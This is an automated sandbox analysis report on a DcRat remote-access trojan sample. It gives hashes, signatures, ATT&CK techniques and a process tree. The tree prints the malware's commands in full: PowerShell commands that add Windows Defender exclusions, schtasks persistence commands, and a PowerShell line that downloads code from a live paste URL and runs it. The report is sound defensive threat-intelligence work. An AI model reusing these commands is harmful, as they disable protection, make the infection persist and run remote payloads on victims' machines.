dcrat | 7a86a58b8a42ea523077932cbe77e25ae21d209ba09b4a2984a0adb1e7702e9f

Analysis

max time kernel
34s
max time network
38s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
08-01-2025 08:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0.exe
Size

108KB
MD5

978077216937f404216319f621dbb269
SHA1

fe700220c4eb6fff630269ef33b77c2cb03aafec
SHA256

7a86a58b8a42ea523077932cbe77e25ae21d209ba09b4a2984a0adb1e7702e9f
SHA512

1c7eea824a6aef8aa56450f2c6904c751dda40b5ed48037672b2ed4d5745e2cb7d4d6ea83795ca53627d6ea53aa802046c78078bcd53420e6f6adff216d139f8
SSDEEP

1536:a4Sr7mdaQV3Vgzmh4DnF2SofJY0CvFbIDCbGjpS9gDHBShm4XZ7ygAY:ir7d+gzCOnESp0iGjRCXhZL

Score

10^/10

dcrat execution infostealer rat

Malware Config

Signatures

DcRat 17 IoCs

DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

rat infostealer dcrat

description	ioc	pid	Process
		1272	schtasks.exe
		4420	schtasks.exe
		2276	schtasks.exe
		3276	schtasks.exe
		1896	schtasks.exe
		1724	schtasks.exe
		3776	schtasks.exe
		1432	schtasks.exe
		4960	schtasks.exe
		4080	schtasks.exe
		8	schtasks.exe
		4572	schtasks.exe
		4880	schtasks.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\SystemCertificates\Root		0.exe
		3528	schtasks.exe
		4332	schtasks.exe
		3016	schtasks.exe

Dcrat family
dcrat

Process spawned unexpected child process 15 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4420	1484	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3528	1484	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2276	1484	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1896	1484	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1272	1484	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4880	1484	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1432	1484	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1724	1484	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4332	1484	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4960	1484	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3016	1484	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4080	1484	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3776	1484	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8	1484	schtasks.exe	83
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3276	1484	schtasks.exe	83

DCRat payload 1 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral1/memory/1328-3-0x000000001B930000-0x000000001BA30000-memory.dmp	dcrat

Blocklisted process makes network request 3 IoCs

flow	pid	Process
27	2708	powershell.exe
28	2708	powershell.exe
30	2708	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1376	powershell.exe
1568	powershell.exe
4504	powershell.exe
2156	powershell.exe
4788	powershell.exe
3376	powershell.exe
2684	powershell.exe
2456	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	0.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	0.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	sysmon.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	svchost.exe

Executes dropped EXE 2 IoCs

pid	Process
2392	sysmon.exe
2424	svchost.exe

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Mozilla Maintenance Service\logs\wininit.exe	0.exe
File opened for modification	C:\Program Files (x86)\Mozilla Maintenance Service\logs\wininit.exe	0.exe
File created	C:\Program Files (x86)\Mozilla Maintenance Service\logs\56085415360792	0.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Scheduled Task/Job: Scheduled Task 1 TTPs 16 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3776	schtasks.exe
1724	schtasks.exe
4332	schtasks.exe
4960	schtasks.exe
1272	schtasks.exe
1432	schtasks.exe
3276	schtasks.exe
3528	schtasks.exe
2276	schtasks.exe
1896	schtasks.exe
4420	schtasks.exe
4880	schtasks.exe
4080	schtasks.exe
3016	schtasks.exe
8	schtasks.exe
4572	schtasks.exe

Suspicious behavior: EnumeratesProcesses 29 IoCs

pid	Process
1328	0.exe
4504	powershell.exe
1568	powershell.exe
1376	powershell.exe
4504	powershell.exe
1568	powershell.exe
1376	powershell.exe
1188	0.exe
1188	0.exe
1188	0.exe
1188	0.exe
1188	0.exe
1188	0.exe
1188	0.exe
1188	0.exe
1188	0.exe
2684	powershell.exe
3376	powershell.exe
3376	powershell.exe
2156	powershell.exe
4788	powershell.exe
2684	powershell.exe
2156	powershell.exe
4788	powershell.exe
2392	sysmon.exe
2456	powershell.exe
2456	powershell.exe
2708	powershell.exe
2708	powershell.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

description	pid	Process
Token: SeDebugPrivilege	1328	0.exe
Token: SeDebugPrivilege	4504	powershell.exe
Token: SeDebugPrivilege	1568	powershell.exe
Token: SeDebugPrivilege	1188	0.exe
Token: SeDebugPrivilege	1376	powershell.exe
Token: SeDebugPrivilege	2684	powershell.exe
Token: SeDebugPrivilege	3376	powershell.exe
Token: SeDebugPrivilege	2156	powershell.exe
Token: SeDebugPrivilege	4788	powershell.exe
Token: SeDebugPrivilege	2392	sysmon.exe
Token: SeDebugPrivilege	2456	powershell.exe
Token: SeDebugPrivilege	2424	svchost.exe
Token: SeDebugPrivilege	2708	powershell.exe

Suspicious use of WriteProcessMemory 36 IoCs

description	pid	Process	procid_target
PID 1328 wrote to memory of 1376	1328	0.exe	91
PID 1328 wrote to memory of 1376	1328	0.exe	91
PID 1328 wrote to memory of 1568	1328	0.exe	92
PID 1328 wrote to memory of 1568	1328	0.exe	92
PID 1328 wrote to memory of 4504	1328	0.exe	93
PID 1328 wrote to memory of 4504	1328	0.exe	93
PID 1328 wrote to memory of 1188	1328	0.exe	97
PID 1328 wrote to memory of 1188	1328	0.exe	97
PID 1188 wrote to memory of 2684	1188	0.exe	108
PID 1188 wrote to memory of 2684	1188	0.exe	108
PID 1188 wrote to memory of 3376	1188	0.exe	109
PID 1188 wrote to memory of 3376	1188	0.exe	109
PID 1188 wrote to memory of 4788	1188	0.exe	110
PID 1188 wrote to memory of 4788	1188	0.exe	110
PID 1188 wrote to memory of 2156	1188	0.exe	111
PID 1188 wrote to memory of 2156	1188	0.exe	111
PID 1188 wrote to memory of 2392	1188	0.exe	116
PID 1188 wrote to memory of 2392	1188	0.exe	116
PID 2392 wrote to memory of 2456	2392	sysmon.exe	123
PID 2392 wrote to memory of 2456	2392	sysmon.exe	123
PID 2392 wrote to memory of 4572	2392	sysmon.exe	125
PID 2392 wrote to memory of 4572	2392	sysmon.exe	125
PID 2392 wrote to memory of 2424	2392	sysmon.exe	127
PID 2392 wrote to memory of 2424	2392	sysmon.exe	127
PID 2424 wrote to memory of 3584	2424	svchost.exe	129
PID 2424 wrote to memory of 3584	2424	svchost.exe	129
PID 3584 wrote to memory of 2708	3584	cmd.exe	132
PID 3584 wrote to memory of 2708	3584	cmd.exe	132
PID 2708 wrote to memory of 4996	2708	powershell.exe	134
PID 2708 wrote to memory of 4996	2708	powershell.exe	134
PID 4996 wrote to memory of 4028	4996	cmd.exe	138
PID 4996 wrote to memory of 4028	4996	cmd.exe	138
PID 4996 wrote to memory of 3348	4996	cmd.exe	140
PID 4996 wrote to memory of 3348	4996	cmd.exe	140
PID 4996 wrote to memory of 4088	4996	cmd.exe	141
PID 4996 wrote to memory of 4088	4996	cmd.exe	141

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\0.exe
"C:\Users\Admin\AppData\Local\Temp\0.exe"
1⤵
- DcRat
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1328
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\0.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1376
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\backgroundTaskHost.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1568
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\fontdrvhost.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4504
- C:\Users\Admin\AppData\Local\Temp\0.exe
  "C:\Users\Admin\AppData\Local\Temp\0.exe"
  2⤵
  - Checks computer location settings
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1188
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\0.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2684
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Mozilla Maintenance Service\logs\wininit.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3376
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\sysmon.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4788
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\fontdrvhost.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2156
- - C:\Recovery\WindowsRE\sysmon.exe
    "C:\Recovery\WindowsRE\sysmon.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2392
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\grabber\svchost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2456
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /F /TN "svchost" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\grabber\svchost.exe" /RL HIGHEST
      4⤵
      DcRat
      Scheduled Task/Job: Scheduled Task
      PID:4572
  - - C:\Users\Admin\AppData\Roaming\grabber\svchost.exe
      "C:\Users\Admin\AppData\Roaming\grabber\svchost.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2424
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C powershell "iwr https://pastejustit.com/raw/msdcgy3bxg | iex"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3584
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "iwr https://pastejustit.com/raw/msdcgy3bxg | iex"
        6⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2708
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\runtime.bat" "
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:4996
        
        C:\Windows\system32\findstr.exe
        
        findstr /i "echo" "C:\Users\Admin\AppData\Roaming\runtime.bat"
        8⤵
        
        PID:4028
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo \\DADDYSERVER "
        8⤵
        
        PID:3348
        
        C:\Windows\system32\findstr.exe
        
        findstr /i "DADDYSERVER"
        8⤵
        
        PID:4088

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4420

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3528

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2276

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1896

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1272

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4880

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\wininit.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1432

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\wininit.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1724

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\wininit.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4332

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\sysmon.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4960

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\sysmon.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3016

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\sysmon.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4080

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3776

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:8

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3276

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Recovery\WindowsRE\5b884080fd4f94

Filesize
607B

MD5
e95437f0bd523e7c82e42fdfdcade880

SHA1
d75caa42075979a8c17aa78c899cf5c26a6dbe2c

SHA256
55ce65ea6bcaad483eec2350446fafac85a43f4a0484b7d7beb2aaacb1d1e7af

SHA512
fbf08667fceaea2f48573aa8eec5fc5f60c6ec3a072e292fa14cfc2b1dc0695943624ae629ee40500058b6650af04e72508ab6e3827bac0643f79755865c676f

Download Submit
C:\Recovery\WindowsRE\fontdrvhost.exe

Filesize
108KB

MD5
978077216937f404216319f621dbb269

SHA1
fe700220c4eb6fff630269ef33b77c2cb03aafec

SHA256
7a86a58b8a42ea523077932cbe77e25ae21d209ba09b4a2984a0adb1e7702e9f

SHA512
1c7eea824a6aef8aa56450f2c6904c751dda40b5ed48037672b2ed4d5745e2cb7d4d6ea83795ca53627d6ea53aa802046c78078bcd53420e6f6adff216d139f8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\0.exe.log

Filesize
1KB

MD5
f4627fbf607e5e45c7c8ec5510c89a15

SHA1
1565a3f807aac1f87c248b16d362b4c1e1ab1124

SHA256
a8e182576eb9b89658f1e378b7c416c8159ecc4f31c53e7e11b429b1e2dbcb38

SHA512
004ebe7189cbd09c533e7d59d50a15164f027ab8fbf18070fec19abc7d128b42ba085274d00a5253a5993a8d1cd02a936d015729f3fb4e1854aca2cccc988f8a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ee9f1be5d4d351a5c376b370adcf0eea

SHA1
1779cecfb13c6a2f0f2813ae65d0d91ebdcf5583

SHA256
70600f0f93bca5f0548bfe5503513caadda31cbcd14dc007824b0925a8626e4b

SHA512
fda7345f64a6352e99bb3f5d94e58751a71d45a27147f60da32d12ff0307dbe416f482f1b9950e52ce63cbb5f0e5c1647f72dbb7a05c5419ccd8b7980ea86754

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
54522d22658e4f8f87ecb947b71b8feb

SHA1
6a6144bdf9c445099f52211b6122a2ecf72b77e9

SHA256
af18fc4864bc2982879aed928c960b6266f372c928f8c9632c5a4eecd64e448a

SHA512
55f2c5a455be20dcb4cb93a29e5389e0422237bdd7ac40112fec6f16a36e5e19df50d25d39a6d5acb2d41a96514c7ecd8631ce8e67c4ff04997282f49d947aba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
f32267ac1ddb28dbda52672355628ad4

SHA1
17a84af001f273234d147572f9301c69e3078465

SHA256
d02e76fb112f578e455d6eb4fef7904cc1b318f4c554441eac5b68a62ae58bc4

SHA512
a4a05c51b08f252c809daf6dab355fa5e1cecb4236e36eea2837dad78c6705c6b55ba11d433fc197dcb3f3813bcde6b1a4c5d17be414b6462a70564d448a0f81

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ctzdao2d.t1a.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\kdotFyooc.bat

Filesize
171B

MD5
e733285e71b4a9f5b4d8621db7df6982

SHA1
a7a315bd04e7115a3e7a488c1faee47480281f47

SHA256
31aa232fe84f449546d9e24f048098a33e7319e361eb9e7d2fec542612a26c46

SHA512
d39d21d62ede4d13aa0544ecacdd48ecc94755ed713eca490b6bd6e3d6961c61cb7873ed382716bf5178eba7139366e8ea6deb84ad2fde0630b98f78578a46ba

Download Submit
C:\Users\Admin\AppData\Roaming\grabber\svchost.exe

Filesize
4KB

MD5
3abc237a050e33baa885be13427e9ed3

SHA1
924ca9d38466f8da7dfec49b55e92805d67dd811

SHA256
6f8af6cb9289ac92ac1de99bdcdd3a9a964713e916c85697f10f2cbc0c5daea1

SHA512
3b6a9ada854cf59023e45d2fc41e91781cda5caff7141ee8ad927d7bd3f9c6410d55059eaacd0dd3a3c799cd3f86c876767f506528f67b17f3e2ab9290c9fb09

Download Submit
C:\Users\Admin\AppData\Roaming\runtime.bat

Filesize
104KB

MD5
8158350247e35657cbccf5054d8a6d33

SHA1
b2cbd3a164a21d168b281a43646a08f4717539af

SHA256
8d4934d75e3a578b2e836507ae1fd02fa67e33c79f5a784c2ead91fecc2fb8f0

SHA512
f772a497baaf2f73b4fa2565abc7e536ce1d505c51271646532662d89f1ee34ad593ffaebc99d67f343e4973268efea7b8bf6cd9f274c4266278fc0e71b04aff

Download Submit
memory/1328-7-0x000000001B0E0000-0x000000001B0EC000-memory.dmp

Filesize
48KB

Download
memory/1328-1-0x00000000003D0000-0x00000000003F4000-memory.dmp

Filesize
144KB

Download
memory/1328-5-0x0000000002500000-0x000000000250C000-memory.dmp

Filesize
48KB

Download
memory/1328-4-0x0000000000BE0000-0x0000000000BEA000-memory.dmp

Filesize
40KB

Download
memory/1328-3-0x000000001B930000-0x000000001BA30000-memory.dmp

Filesize
1024KB

Download
memory/1328-2-0x00007FFA5E2C0000-0x00007FFA5ED81000-memory.dmp

Filesize
10.8MB

Download
memory/1328-33-0x00007FFA5E2C0000-0x00007FFA5ED81000-memory.dmp

Filesize
10.8MB

Download
memory/1328-0-0x00007FFA5E2C3000-0x00007FFA5E2C5000-memory.dmp

Filesize
8KB

Download
memory/1328-6-0x000000001B0D0000-0x000000001B0DE000-memory.dmp

Filesize
56KB

Download
memory/2392-124-0x000000001D190000-0x000000001D196000-memory.dmp

Filesize
24KB

Download
memory/2392-123-0x000000001D180000-0x000000001D186000-memory.dmp

Filesize
24KB

Download
memory/2424-136-0x00000000007B0000-0x00000000007B8000-memory.dmp

Filesize
32KB

Download
memory/2708-148-0x000002C2FD410000-0x000002C2FDBB6000-memory.dmp

Filesize
7.6MB

Download
memory/4504-14-0x00000180ECBC0000-0x00000180ECBE2000-memory.dmp

Filesize
136KB

Download